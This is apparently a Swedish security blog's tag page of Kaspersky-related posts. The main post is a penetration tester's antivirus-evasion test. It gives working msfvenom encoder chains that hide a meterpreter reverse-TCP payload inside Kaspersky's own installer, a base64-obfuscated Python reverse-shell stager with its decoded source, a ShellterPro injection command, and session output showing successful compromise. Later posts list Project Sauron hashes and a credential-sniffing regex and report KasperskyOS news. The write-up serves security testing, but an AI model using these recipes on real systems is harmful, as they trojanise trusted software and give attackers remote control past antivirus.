Taggat med: Kaspersky

Test av gratis anti-virus från Kaspersky

Kaspersky lanserade nyligen en gratis version av sin antivirusmjukvara och jag bestämde mig för att testa vad den går för. Som del av mina uppdrag då jag testar säkerheten för mina uppdragsgivare (penetrationstester) så förekommer det att jag får i uppdrag att ta mig förbi eventuella säkerhetsprodukter såsom sandlådor och antivirus.

Det råder ingen tvekan om att det går att ta sig förbi majoriteten av alla säkerhetssystem såsom sandlådor, data loss prevention-verktyg och antivirus. Att däremot upptäcka i tid när någon försöker ta sig förbi ett säkerhetssystem och reagera på detta är avgörande.

Allmänna synpunkter om Kaspersky Free

Att ladda hem och installera Kaspersky Free Anti-Virus gick smidigt. Vid installationen fick jag frågan om jag vill ingå i Kaspersky Security Network (KSN) och då dela med mig av information om min dator samt skadlig kod som upptäcks på min dator. Jag förstår att inget i livet är gratis och att om jag använder Kaspersky Free så måste jag dela med mig av något. Men det verkar inte som att det är ett måste att ingå i KSN.

Nästa fundering är att det står att licensen gäller i 365 dagar. Vad händer efter det?

Test 1: Testvirus Eicar vs Kaspersky

Det första testet jag genomför är att ladda hem testviruset Eicar. Det finns på eicar.org och går att ladda hem på lite olika sätt: Direkt via HTTP, HTTPS eller i zip-fil. När jag laddar hem Eicar via HTTP så får jag ett meddelande direkt i webbläsaren att jag försöker ladda hem skadlig kod, vilket då påvisar att Kaspersky granskar okrypterad webbtrafik.

När jag försöker ladda hem Eicar via HTTPS så får jag inget meddelande, men jag varnas om jag aktivt försöker starta filen eller söker igenom filen. Detta visar på att Kaspersky ej troligtvis genomför MITM (man i mitten på HTTPS-surf).

Bra, då har vi verifierat att Kaspersky Free Anti-Virus är korrekt installerat.

Test 2: Powershell implantat vs Kaspersky

Nu börjar det bli lite mer avancerat. I detta test  tänker jag testa ett implantat som heter PoshC2 och ligger på Github. Implantatet kan levereras via MS16-051, Word-makron eller Java JAR-filer. Jag väljer att köra via ett Word-makro och installation samt kommunikation fungerar utmärkt.

PoshC2-implantat vs. Kaspersky

Skärmdumpen ovan påvisar att beacon skickas var femte sekund och att användaren heter IEUser. Eftersom Kaspersky var dålig på att upptäcka detta implantat så testar jag även att skicka upp Word-dokumentet till VirusTotal:

Bland de antivirus-motorer som detekterar denna skadlig kod är Avira, Avast, Fortinet och AVG.  Jag noterar också att den gratis IOC-skannern Loki detekterar detta.

Test 3: Metasploit vs Kaspersky

Med hjälp av operativsystemet Kali Linux där Metasploit finns förinstallerat skapar jag en meterpreter reverse TCP payload.

Jag använder msfvenom på följande sätt:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.101.2.254 LPORT=443 -f raw -e x86/shikata_ga_nai -i 9 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -x kfa17.0.0.611abcsv_11811.exe -k -f exe -o kfa17.0.0.611abcsv_11811-meterpreter-msf.exe

Ovan kommandorad använder flertalet obfuskerare såsom shikata-ga-nai och lägger till Metasploits modul för att ansluta hem.

Denna payload gömmer vi sedan i Kasperskys egen installationsfil kfa17.0.0.611abcsv_11811.exe.

Detta var dock ingen match för Kaspersky att upptäcka:

Nästa test jag gör med Metasploit är att skapa en Python payload med hjälp av msfvenom:

msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.99.101 LPORT=443

Denna kod måste jag sedan modifiera så den fungerar tillsammans med PyInstaller som skapar en fristående .exe-fil.

Ser ut ungefär så här:

import base64,sys,socket,code,platform,shutil
exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguOTkuMTAxJyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

Vilket motsvarar följande kod utan Base64-kodning:

import socket,struct,time
for x in range(10):
  try:
	s=socket.socket(2,socket.SOCK_STREAM)
	s.connect(('192.168.99.101',443))
	break
  except:
	time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
  while len(d)

När jag sedan testar att köra exe-filen från PyInstaller så blir det ingen detektion hos Kaspersky:

[*] Sending stage (40747 bytes) to 192.168.99.100
[*] Meterpreter session 6 opened (192.168.99.101:443 -> 192.168.99.100:50511) at 2017-08-24 09:44:11 -0400
 msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > sysinfo
 Computer : IE11Win8_1
 OS : Windows 8.1 6.3.9600
 Architecture : x86
 Meterpreter : python/windows
 meterpreter >

Eftersom Kaspersky inte lyckades att detektera mitt test är det intressant att se vad VirusTotal säger om filen. 13 av 64 antivirus-motorer kan detektera  namnet på testet.

Test 4: Shellter vs Kaspersky

Shellter Project är ett intressant verktyg som enligt utvecklaren kan användas för att dynamiskt injicera shellcode i PE-filer (Portable Executable).

Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.

Inbyggt i Shellter är möjligheten att skapa ett antal olika Metasploit meterpreter payloads:

  • meterpreter_reverse_tcp
  • meterpreter_reverse_http
  • meterpreter_reverse_https
  • meterpreter_bind_tcp
  • shell_reverse_tcp
  • shell_bind_tcp
  • WinExec

Och väljer du att köpa betalversionen (Pro) för 90 USD så får du ytterligare några payloads:

  • Meterpreter_Reverse_WINHTTP
  • Meterpreter_Reverse_WINHTTPS
  • Shell_Reverse_TCP_DNS

Och har du en egen payload så går det givetvis också bra. Några exempel på egen payload följer med i mappen shellcode_samples.

 

Jag kör Kali Linux där jag installerat Wine och startar ShellterPro som är betalversionen med hjälp av följande argument:

wine ShellterPro.exe -f ../kfa17.0.0.611abcsv_11811.exe -p meterpreter_reverse_tcp --lhost 192.168.99.101 --port 443 --encode --handler IAT --polyExtra --incSize 500 --Junk -s

Detta gör att payloaden meterpreter_reverse_tcp läggs till i filen kfa17.0.0.611abcsv_11811.exe. Övriga argument har att göra med hur Shellter försöker dölja payloaden för antivirus-program.

Sedan för jag över filen till Windows där Kaspersky körs och får då en anslutning till Metasploit när användaren klickar på filen:

[*] Sending stage (956991 bytes) to 192.168.99.100
[*] Meterpreter session 1 opened (192.168.99.101:443 -> 192.168.99.100:57922) at 2017-08-25 02:38:52 -0400

msf exploit(handler) >
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer : IE11WIN8_1
OS : Windows 8.1 (Build 9600).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >

Laddar jag sedan upp denna testfil till VirusTotal så är det enbart 4 st antivirus-motorer som identifierar denna som skadlig kod:

Slutsats

Det är relativt lätt att ta sig förbi Kaspersky antivirus men ovan visar på att inget antivirus är fullständigt. Om du vill vara på den säkra sidan bör du använda flertalet antivirus-motorer, åtminstone i gateways såsom perimeterskyddet mot internet och vid analys av filer på löstagbart media.

Att använda ett antivirusprogram är helt klart bättre än att inte använda något alls. I ovan tester mot VirusTotal så ingår inte Microsofts eget gratisskydd Security Essentials.

Tack till Laban Sköllermark och Emma Lilliestam för korrekturläsning.

Kaspersky släpper KasperskyOS

Det ryska antivirus-företaget Kaspersky släpper ett operativsystem vid namn KasperskyOS. Operativsystemet har varit under utveckling i 14 år och har fokus på säkerhet i Internet of Things (11-11 var kodnamnet för OS:et tidigare).

OS:et kommer inte gå att köpa direkt från Kaspersky utan kommer att levereras med olika typer av utrustning direkt från hårdvaruleverantörer.

KasperskyOS använder sig av en mikrokernel som har Flux Advanced Security Kernel (FLASK) arkitektur. Flask är framtaget av bl.a. amerikanska myndigheten NSA och används av SELinux, TrustedBSD.

Kaspersky Secure Hypervisor kan användas tillsammans med KasperskyOS och då köra andra operativsystem, även så är OS:et POSIX-kompatibelt.

Redan nu har Kaspersky samarbete med två leverantörer: Kraftway switches samt SYSGO PikeOS som går KasperskyOS hypervisor (KSH). Operativet kommer inte som öppen källkod men möjlighet finns för leverantörer att granska koden.

Läs mer på Eugene Kasperskys blogg eller tekniska detaljer på securelist.

Skärmdump från uppstart:

Kraftway-switch med Kaspersky OS:

Ny avancerad skadlig kod: Remsec / Project Sauron

För några dagar sedan så gick flertalet stora antivirus-leverantörer ut med en varning samt teknisk analys av en ny form av avancerad skadlig kod som troligtvis är utvecklad av gruppen Strider. Denna APT-liknande grupp (advanced persistent threat) har utvecklat Sauron (Remsec) sedan 2011 och har identifieras hos myndigheter i länder såsom Kina, Sverige, Ryssland och Belgien.

Projekt Sauron är sannolikt utvecklat av en stat eller statsunderstödd grupp i likhet med skadlig kod såsom Duqu, Flame, Equation, och Regin.

Koden är modulär och majoriteten av modulerna är skriva i programspråket Lua (precis som Stuxnet).

Att den skadliga koden fått namnet Sauron är på grund av denna Lua-modul som sköter tangentbords-loggningen (keylogger):

Projekt Sauron

Även så innehåller den skadliga koden en loggningsmodul som även krypterar och komprimerar loggar. I övrigt har inga felstavningar observerats men exempelvis så förekommer italienska ord när nätvertrafik genomsöks efter ord såsom secret, pw, pass codice|uin|signin|strCodUtente|.*pass.*|.*pw|pw.*|additional_info|.*secret.*|.*segreto.*

Antivirusdetektion

En del av den skadliga koden som laddar in binära objekt upptäcktes först av Kaspersky 20160406 och då som HEUR:Trojan.Multi.Remsec.gen. Ungefär en vecka efter detta så kan även AegisLab, Antiy-AVL och Rising den skadliga koden.

Luftgap

Den skadliga koden ProjectSauron har även stöd för att ta sig över ”airgaps” eller luftgap som det heter på svenska. Dvs system som är så pass säkra/hemliga att de inte är anslutna till Internet. När en USB-sticka ansluts så skapas det ett virtuellt filsystem som inte är synligt med blotta ögat.

Även så är någon slags zero-day involverad som nyttjas när USB-stickor förflyttas mellan nätverk. Men varken Symantec eller Kaspersky vet ännu inte hur detta fungerar exakt.

Persistens

Installerar sig som en SSPI, Security Support Provider Interface och exporterar funktionen InitSecurityInterfaceW.

Kryptering

Över nätverket sker kryptering med RSA samt RC6 (5?). Lokala filer krypteras med RC4 samt Salsa20.

Nyckel som används är: 0xBAADF00D. Även kan C&C-kommandon skickas via ICMP och lyckas dekrypteringen av ICMP-paketet så kommer koden att exekveras på systemet.

False flag

Att baka in felaktiga eller information som vilseleder den som analyserar skadlig kod är något som blivit populärt på senare tid. Även Sauron gör detta och är extra tydligt när man tittar på metadata såsom när koden kompilerades:

PE-Header compilator timestmap: 2009-07-14 01:07:24

Hashsummor

Detta är hashsummor för Win32 DLL:en som är ansvarig för att ladda in moduler:

MD5 2a8785bf45f4f03c10cd929bb0685c2d
SHA-1 d18792a187d7567f3f31908c05a8b8a2647d365f
SHA-256 6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd
ssdeep 1536:XnEBRAJD8UuUFT1CKKoau6uWqv/gQcIOtED:XnEcz5FTiteoQStE

Filnamn: MSAOSSPC.DLL

Och på disken så används katalog: “c:\System Volume Information\_restore{ED650925- A32C-4E9C-8A73-8E6F0509309A}\RP0\A???????.dll” för moduler.

DLL-en maskeras som AOL Security Package.

Externa PDF-er med mer information:

Fler checksummor från Github:

1F7DDB6752461615EBF0D76BDCC6AB1A;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
227EA8F8281B75C5CD5F10370997D801;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
2F704CB6C080024624FC3267F9FDF30E;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
34284B62456995CA0001BC3BA6709A8A;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
501FE625D15B91899CC9F29FDFC19C40;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
6296851190E685498955A5B37D277582;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
6B114168FB117BD870C28C5557F60EFE;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
7B6FDBD3839642D6AD7786182765D897;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
7B8A3BF6FD266593DB96EDDAA3FAE6F9;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
C0DFB68A5DE80B3434B04B38A61DBB61;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
B6273B3D45F48E9531A65D0F44DFEE13;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
BB6AEC0CF17839A6BEDFB9DDB05A0A6F;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
C074710482023CD73DA9F83438C3839F;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
C3F8F39009C583E2EA0ABE2710316D2A;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
CF6C049BD7CD9E04CC365B73F3F6098E;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
40F751F2B22208433A1A363550C73C6B;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
1D9D7D05AB7C68BDC257AFB1C086FB88;Project Sauron https://goo.gl/eFoP4A - Passive sniffer backdoor
181c84e45abf1b03af0322f571848c2d;Project Sauron https://goo.gl/eFoP4A - Generic pipe backdoor
2e460fd574e4e4cce518f9bc8fc25547;Project Sauron https://goo.gl/eFoP4A - Generic pipe backdoor
1f6ba85c62d30a69208fe9fb69d601fa;Project Sauron https://goo.gl/eFoP4A - Generic pipe backdoor
F3B9C454B799E2FE6F09B6170C81FF5C;Project Sauron https://goo.gl/eFoP4A - Null session pipes backdoor
0C12E834187203FBB87D0286DE903DAB;Project Sauron https://goo.gl/eFoP4A - Null session pipes backdoor
72B03ABB87F25E4D5A5C0E31877A3077;Project Sauron https://goo.gl/eFoP4A - Null session pipes backdoor
76DB7E3AF9BE2DFAA491EC1142599075;Project Sauron https://goo.gl/eFoP4A - Null session pipes backdoor
5D41719EB355FDF06277140DA14AF03E;Project Sauron https://goo.gl/eFoP4A - Null session pipes backdoor
A277F018C2BB7C0051E15A00E214BBF2;Project Sauron https://goo.gl/eFoP4A - Null session pipes backdoor
0C4A971E028DC2AE91789E08B424A265;Project Sauron https://goo.gl/eFoP4A - Pipe and internet backdoor
44C2FA487A1C01F7839B4898CC54495E;Project Sauron https://goo.gl/eFoP4A - Pipe and internet backdoor
F01DC49FCE3A2FF22B18457B1BF098F8;Project Sauron https://goo.gl/eFoP4A - Pipe and internet backdoor
F59813AC7E30A1B0630621E865E3538C;Project Sauron https://goo.gl/eFoP4A - Pipe and internet backdoor
CA05D537B46D87EA700860573DD8A093;Project Sauron https://goo.gl/eFoP4A - Pipe and internet backdoor
01AC1CD4064B44CDFA24BF4EB40290E7;Project Sauron https://goo.gl/eFoP4A - Pipe and internet backdoor
1511F3C455128042F1F6DB0C3D13F1AB;Project Sauron https://goo.gl/eFoP4A - Pipe and internet backdoor
57C48B6F6CF410002503A670F1337A4B;Project Sauron https://goo.gl/eFoP4A - Pipe and internet backdoor
EDB9E045B8DC7BB0B549BDF28E55F3B5;Project Sauron https://goo.gl/eFoP4A - Pipe and internet backdoor
71EB97FF9BF70EA8BB1157D54608F8BB;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
2F49544325E80437B709C3F10E01CB2D;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
7261230A43A40BB29227A169C2C8E1BE;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
FC77B80755F7189DEE1BD74760E62A72;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
A5588746A057F4B990E215B415D2D441;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
0209541DEAD744715E359B6C6CB069A2;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
FCA102A0B39E2E3EDDD0FE0A42807417;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
5373C62D99AFF7135A26B2D38870D277;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
91BB599CBBA4FB1F72E30C09823E35F7;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
914C669DBAAA27041A0BE44F88D9A6BD;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
C58A90ACCC1200A7F1E98F7F7AA1B1AE;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
63780A1690B922045625EAD794696482;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
8D02E1EB86B7D1280446628F039C1964;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
6CA97B89AF29D7EFF94A3A60FA7EFE0A;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
93C9C50AC339219EE442EC53D31C11A2;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
F7434B5C52426041CC87AA7045F04EC7;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
F936B1C068749FE37ED4A92C9B4CFAB6;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
2054D07AE841FCFF6158C7CCF5F14BF2;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
6CD8311D11DC973E970237E10ED04AD7;Project Sauron https://goo.gl/eFoP4A - Core platform (LUA VFS)
5DDD5294655E9EB3B9B2071DC2E503B1;Project Sauron https://goo.gl/eFoP4A - MyTrampoline
5DDD5294655E9EB3B9B2071DC2E503B1;Project Sauron https://goo.gl/eFoP4A - Bus Manager
2A8785BF45F4F03C10CD929BB0685C2D;Project Sauron https://goo.gl/eFoP4A - Bus Manager
F0E0CBF1498DBF9B8321D11D21C49811;Project Sauron https://goo.gl/eFoP4A - Bus Manager
AC8072DFDA27F9EA068DCAD5712DD893;Project Sauron https://goo.gl/eFoP4A - Bus Manager
2382A79F9764389ACFB4CB4692AA044D;Project Sauron https://goo.gl/eFoP4A - Bus Manager
85EA0D79FF015D0B1E09256A880A13CE;Project Sauron https://goo.gl/eFoP4A - Bus Manager
4728A97E720C564F6E76D0E22C76BAE5;Project Sauron https://goo.gl/eFoP4A - Bus Manager
B98227F8116133DC8060F2ADA986631C;Project Sauron https://goo.gl/eFoP4A - Bus Manager
D2065603EA3538D17B6CE276F64AA7A2;Project Sauron https://goo.gl/eFoP4A - Bus Manager
FCD1A80575F503A5C4C05D4489D78FF9;Project Sauron https://goo.gl/eFoP4A - Bus Manager
EB8D5F44924B4DF2CE4A70305DC4BD59;Project Sauron https://goo.gl/eFoP4A - Bus Manager
17DEB723A16856E72DD5C1BA0DAE0CC7;Project Sauron https://goo.gl/eFoP4A - Bus Manager
B6FE14091359399C4EA572EBF645D2C5;Project Sauron https://goo.gl/eFoP4A - Bus Manager
C8C30989A25C0B2918A5BB9FD6025A7A;Project Sauron https://goo.gl/eFoP4A - Bus Manager
814CA3A31122D821CD1E582ABF958E8F;Project Sauron https://goo.gl/eFoP4A - Bus Manager
951EBE1EE17F61CD2398D8BC0E00B099;Project Sauron https://goo.gl/eFoP4A - Network Sniffer
d737644d612e5051f66fb97a34ec592b3508be06e33f743a2fdb31cdf6bd2718;Symantec Strider Report http://goo.gl/bTtpGD
30a824155603c2e9d8bfd3adab8660e826d7e0681e28e46d102706a03e23e3a8;Symantec Strider Report http://goo.gl/bTtpGD
a4736de88e9208eb81b52f29bab9e7f328b90a86512bd0baadf4c519e948e5ec;Symantec Strider Report http://goo.gl/bTtpGD
8e63e579dded54f81ec50ef085929069d30a940ea4afd4f3bf77452f0546a3d3;Symantec Strider Report http://goo.gl/bTtpGD
96c3404dadee72b1f27f6d4fbd567aac84d1fdf64a5168c7ef2464b6c4b86289;Symantec Strider Report http://goo.gl/bTtpGD
04ea378405c9aa879478db3d6488ce79b694393501555ccabc109fa0f4844533;Symantec Strider Report http://goo.gl/bTtpGD
720195b07c81e95dab4a1469342bc723938733b3846d7647264f6d0816269380;Symantec Strider Report http://goo.gl/bTtpGD
2f128fff48d749f08786e618d3a44e2ac8020cc2ece5034cb1079901bbde6b7e;Symantec Strider Report http://goo.gl/bTtpGD
6189b94c9f3982ce15015d68f280f5d7a87074b829edb87825cadab6ec1c7ec2;Symantec Strider Report http://goo.gl/bTtpGD
6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd;Symantec Strider Report http://goo.gl/bTtpGD
d629aa328fef1bd3c390751575f65d2f568b4b512132d77ab3693709ae2d5c84;Symantec Strider Report http://goo.gl/bTtpGD
9035a1e71c87620ead00d47c9db3768b52197703f124f097fa38dd6bf8e2edc8;Symantec Strider Report http://goo.gl/bTtpGD
36b74acba714429b07ab2205ee9fc13540768d7d8d9d5b2c9553c44ea0b8854f;Symantec Strider Report http://goo.gl/bTtpGD
0f8af75782bb7cf0d2e9a78af121417ad3c0c62d8b86c8d2566cdb0f23e15cea;Symantec Strider Report http://goo.gl/bTtpGD
bde264ceb211089f6a9c8cfbaf3974bf3d7bf4843d22186684464152c432f8a5;Symantec Strider Report http://goo.gl/bTtpGD
4a15dfab1d150f2f19740782889a8c144bd935917744f20d16b1600ae5c93d44;Symantec Strider Report http://goo.gl/bTtpGD
3782b63d7f6f688a5ccb1b72be89a6a98bb722218c9f22402709af97a41973c8;Symantec Strider Report http://goo.gl/bTtpGD
6b06522f803437d51c15832dbd6b91d8d8b244440b4d2f09bd952f335351b06d;Symantec Strider Report http://goo.gl/bTtpGD
96e6b2cedaf2840b1939a9128751aec0f1ac724df76970bc744e3043281d3afd;Symantec Strider Report http://goo.gl/bTtpGD
02a9b52c88199e5611871d634b6188c35a174944f75f6d8a2110b5b1c5e60a48;Symantec Strider Report http://goo.gl/bTtpGD
ab8181ae5cc205f1d3cae00d8b34011e47b735a553bd5a4f079f03052b74a06d;Symantec Strider Report http://goo.gl/bTtpGD
c8f95bf8a76ff124cc1d7a8439beff360d0eb9c0972d42a8684c3bd4e91c6600;Symantec Strider Report http://goo.gl/bTtpGD
9572624b6026311a0e122835bcd7200eca396802000d0777dba118afaaf9f2a9;Symantec Strider Report http://goo.gl/bTtpGD

Källor: FSB, VirusTotal, Kaspersky och Symantec

Test av Kaspersky Anti-virus

Inte direkt krypterings-relaterat men lika bra att skriva en liten evalueringsrapport när vi ändå ska testa Kaspersky Anti-virus här på redaktionen.

Den version vi testar är version 8 (8.0.1.50) för Linux och deb-paket. Denna version finns att ladda hem och testa under 30 dagar. När man registrerar sig för ett test-konto så skickas även en länk för nedladdning av deb-paketet och en .key-fil som är licensen som används under dessa 30 testdagar.

Paktetet installeras med dpkg -i kes4lwks_8.0.1-50_i386.deb, vi fick ett felmeddelande att paktet libc6-i386 även måste installeras på vårat Ubuntu-system.

Efter detta gick det bra att installera Kaspersky Anti-virus. Efter installation så ska man köra /opt/kaspersky/kes4lwks/bin/kes4lwks-setup.pl för att ställa in installationen.

That’s it! Happy virus-hunting. Vi återkommer med ett test i nästa del av vår utvärdering.

PS: Använd denna länk för registering av test för Kaspersky Workspace Security http://www.kaspersky.com/downloads/trials/koss1_trial_download

Säkerhetslucka i krypterad IP-telefoni åtgärdad

Två studenter vid KTH har identifierat ett motmedel i krypterad IP-telefoni som gör att avlyssning ej är möjlig. Genom att använda en teknik vid namn phrase spotting technique så är det möjligt att urskilja vad som sägs vid krypterad IP-telefoni, detta är en avlyssninsteknik som tidigare identifierats vid MIT och av Google-anställda.

På bilden: Vasily Prokopov

Det studenterna nu har gjort är att analysera problemet och kommit med förslag på flera sätt att skydda sig mot säkerhetsluckan, och därtill introducerad en ny teknisk modell – voice coder – för hur man ska kunna kommunicera utan att riskera att bli avlyssnad.

Studenterna Vasily Prokopov och Oleksii Chyrkov gjorde medverkar även i en tävling som anti-virusföretaget Kaspersky utlyst.

Läs nyheten i sin helhet hos KTH >